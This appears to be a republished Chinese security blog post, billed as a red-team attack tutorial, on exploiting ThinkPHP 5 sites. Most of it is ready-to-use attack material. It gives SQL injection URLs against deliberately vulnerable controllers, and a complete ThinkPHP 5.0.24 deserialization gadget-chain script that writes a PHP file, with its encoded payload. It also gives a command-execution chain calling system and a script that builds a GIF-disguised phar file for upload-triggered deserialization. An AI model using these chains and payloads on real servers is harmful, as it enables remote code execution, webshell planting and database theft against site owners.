红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化
2022-9-28 13:6:32 Author: moonsec(查看原文) 阅读量:36 收藏

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

1介绍

thinkphp框架开发的网站特别的多,如一些骗子站,传销站,还有一些网站cms都是基于整个框架。
这里主要针对thinkphp5这个版本。基于这个框架开发的产品特别多。

2常见漏洞

1.SQL注入1

<?php
namespace app\index\controller;use think\Db;class Index{ //sqli注入 public function test3(){ echo "test3"; $id = input('id'); $result = Db::name('users')->where("id = {$id}")->select(); echo "<pre>"; var_dump($result); echo "</pre>"; }

}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

2.SQL注入2

<?php
namespace app\index\controller;use think\Db;class Index{ public function index(){
$username = request()->get('username'); $result = db('users')->where('username','exp',$username)->select(); echo "<pre>"; var_dump($result); echo "</pre>"; }

}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23

3.thinkphp5 反序列化写文件
这里就以 thinkphp5.0.24 这个版本 其他版本大同小异

<?phpnamespace think\process\pipes{    use think\model\Pivot;    use think\cache\driver\Memcached;    class Windows{        private $files = [];        public function __construct($path,$data){            $this->files = [new Pivot($path,$data)];        }    }    $data = base64_encode('<?php phpinfo();?>');    echo "tp5.0.24 write file pop Chain\n";    echo "The '=' cannot exist in the data,please check:".$data."\n";    $path = 'php://filter/convert.base64-decode/resource=./';    $aaa = new Windows($path,$data);    echo base64_encode(serialize($aaa));    echo "\n";    echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($path,$data){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($path,$data);            $this->parent = new \think\console\Output($path,$data);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($path,$data){            $this->selfRelation = false;            $this->query = new Query($path,$data);            $this->bindAttr = ['a'.$data];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($path,$data){            $this->model = new Output($path,$data);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($path,$data){            $this->styles = ['getAttr'];            $this->handle = new Memcache($path,$data);        }    }}namespace think\session\driver{    use think\cache\driver\File;    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($path,$data){            $this->handler = new Memcached($path,$data);        }    }}namespace think\cache\driver{    class Memcached    {        protected $handler;        protected $tag;        protected $options = [];        public function __construct($path,$data){            $this->options = ['prefix'   => ''];            $this->handler = new File($path,$data);            $this->tag = true;        }    }}namespace think\cache\driver{    class File    {        protected $options = [];        protected $tag;        public function __construct($path,$data){            $this->tag = false;            $this->options = [                'expire'        => 0,                'cache_subdir'  => false,                'prefix'        => '',                'path'          => $path,                'data_compress' => false,            ];        }    }}

在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
unserialize(加密函数(传入值)) 这种模式居多  这里就以这个为例子。

<?phpnamespace app\index\controller;
class Index{ public function index(){

return "thinkphp 5.0.24";

}
//反序列化 public function test1(){ $id = unserialize(base64_decode($_GET['data'])); var_dump($id); } //反序列化 phar public function test2(){ echo file_get_contents($_GET['file']); } }
http://www.tp5024.com/index.php/index/index/test1?data=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

4.thinkphp5 phar反序列化  
首先 php里要关闭这个只读模式

thinkphp5.0.24 还有其他链子

<?phpnamespace think\process\pipes{    use think\model\Pivot;    ini_set('display_errors',1);    class Windows{        private $files = [];        public function __construct($function,$parameter){            $this->files = [new Pivot($function,$parameter)];        }    }    $aaa = new Windows('system','whoami');    echo base64_encode(serialize($aaa));}



namespace think{ abstract class Model {}}namespace think\model{ use think\Model; use think\console\Output; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relation\BelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace think\model\relation{ use think\db\Query; use think\model\Relation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace think\db{ use think\console\Output; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace think\console{ use think\session\driver\Memcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace think\session\driver{ use think\cache\driver\Memcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace think\cache\driver{ use think\Request; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}

这个是命令执行的 将它改成 phar 生成的包

<?phpnamespace think\process\pipes{    use think\model\Pivot;    ini_set('display_errors',1);    class Windows{        private $files = [];        public function __construct($function,$parameter){            $this->files = [new Pivot($function,$parameter)];        }    }
}


namespace { use think\process\pipes\Windows; $data= new Windows('system', 'whoami'); unlink('exp2.phar'); $phar = new Phar('exp2.phar'); $phar -> stopBuffering(); $phar->setStub("GIF89a"."<?php __HALT_COMPILER();?>");//设置stub $phar -> addFromString('test.txt','test'); $object = $data; $phar -> setMetadata($object); $phar -> stopBuffering();}

namespace think{ abstract class Model {}}namespace think\model{ use think\Model; use think\console\Output; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relation\BelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace think\model\relation{ use think\db\Query; use think\model\Relation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace think\db{ use think\console\Output; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace think\console{ use think\session\driver\Memcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace think\session\driver{ use think\cache\driver\Memcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace think\cache\driver{ use think\Request; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}

找个地方上传 审计文件操作函数 然后传入就可以了。

一般的方法是上传图片 再用phar访问就能触发了

http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt

3关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏

4关于培训

需要渗透测试培训可联系暗月

手机扫一扫 即可添加好友咨询


课程详细介绍点击下面连接即可了解
暗月渗透测试课程更新


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653583153&idx=1&sn=53e17b32f153e836f86e506db02542ce&chksm=811b6173b66ce8656a289000e6416d6a3e7c289c5212eb9ae730fffa7b8be870582d7dbc3d15#rd
如有侵权请联系:admin#unsafe.sh